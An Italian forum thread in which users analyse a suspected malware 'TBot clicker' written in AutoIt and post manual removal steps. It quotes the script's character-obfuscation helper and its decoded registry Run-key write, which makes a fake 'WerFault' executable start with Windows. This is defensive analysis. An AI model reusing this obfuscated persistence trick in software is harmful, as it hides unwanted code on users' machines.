RegWrite(_f2(72) & _f2(75) & _f2(67) & _f2(85) & _f2(92)....

che tradotto con la stessa funzione all'interno dello script

Func _f2($a)
Return Chr($a + 22 - 11 - 10 - 1)
EndFunc

significa
regWrite("HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run","WerFault", "REG_SZ", ....

Praticamente impone alla macchina di avviarsi insieme a windows, il che è molto strano, non ho voluto continuare perché il resto non mi piaceva affatto

ho trovato la mia soluzione ahahah a voi i commenti

Ti conviene finire l'analisi... Almeno si può fornire un metodo di rimozione

Phy_AsTy · 18 Gennaio 2015

Io non l'ho eseguito, quindi non mi conviene xD però se utile non appena trovo 10 minuti lo faccio, consiglio inoltre di eliminare il download per sicurezza, dato che il "Tbot" (l'originale) è già stato postato nella sezione uno o due post sotto questo
"Non sono ancora sicura che sia un malware ma comunque saprò la risposta!
per il momento, PRIMO METODO DI RIMOZIONE
aprite task manager è chiudere tutti i WerFault.exe
dirigersi in system dir come suggerisce la riga
-->
[MENTION=134]system[/MENTION]Dir & "\WerFault.exe"
<--
praticamente la system32 o la sysWOW64 per x64 (controllatele entrambi=)
ed eliminare i WerFault.exe, pigiare f5 dopo qualche secondo e ricontrollate la situazione
(io non ho beccato il virus, quindi non posso controllare)
adesso aprite da start, digitando regedit.exe il Registro di sistema
(Da windows 8 / 8.1 charm bar--> Ricerca--> regedit.exe)
seguite la lista ad albero partendo da :
HKEY_CURRENT_USER seguire con le cartelle:
Software
Microsoft
CurrentVersion
Run

eliminare la nota per WerFault.exe con un semplice click del destro, riavviare il computer e ricontrollare
le sys dir
per il momento è solo una bozza

Zanna · 18 Gennaio 2015

Phy_AsTy ha detto:
Io non l'ho eseguito, quindi non mi conviene xD però se utile non appena trovo 10 minuti lo faccio, consiglio inoltre di eliminare il download per sicurezza, dato che il "Tbot" (l'originale) è già stato postato nella sezione uno o due post sotto questo
"Non sono ancora sicura che sia un malware ma comunque saprò la risposta!
per il momento, PRIMO METODO DI RIMOZIONE
aprite task manager è chiudere tutti i WerFault.exe
dirigersi in system dir come suggerisce la riga
-->
@systemDir & "\WerFault.exe"
<--
praticamente la system32 o la sysWOW64 per x64 (controllatele entrambi=)
ed eliminare i WerFault.exe, pigiare f5 dopo qualche secondo e ricontrollate la situazione
(io non ho beccato il virus, quindi non posso controllare)
adesso aprite da start, digitando regedit.exe il Registro di sistema
(Da windows 8 / 8.1 charm bar--> Ricerca--> regedit.exe)
seguite la lista ad albero partendo da :
HKEY_CURRENT_USER seguire con le cartelle:
Software
Microsoft
CurrentVersion
Run

eliminare la nota per WerFault.exe con un semplice click del destro, riavviare il computer e ricontrollare
le sys dir
per il momento è solo una bozza

Bravissimo

.

Phy_AsTy · 19 Gennaio 2015

Zanna ha detto:
Bravissimo .

Non voglio essere ringraziat piuttosto mi chiedo... il download come mai è ancora li?

Zanna · 19 Gennaio 2015

Phy_AsTy ha detto:
Non voglio essere ringraziat piuttosto mi chiedo... il download come mai è ancora li?

Modifico io.

Cerca

release TBot new clicker

IPLay

Zanna

.SexyCactus

Devilnever

koth

novellino

Phy_AsTy

Nhoya

Phy_AsTy

Zanna

Phy_AsTy

Zanna

DISCUSSIONI SIMILI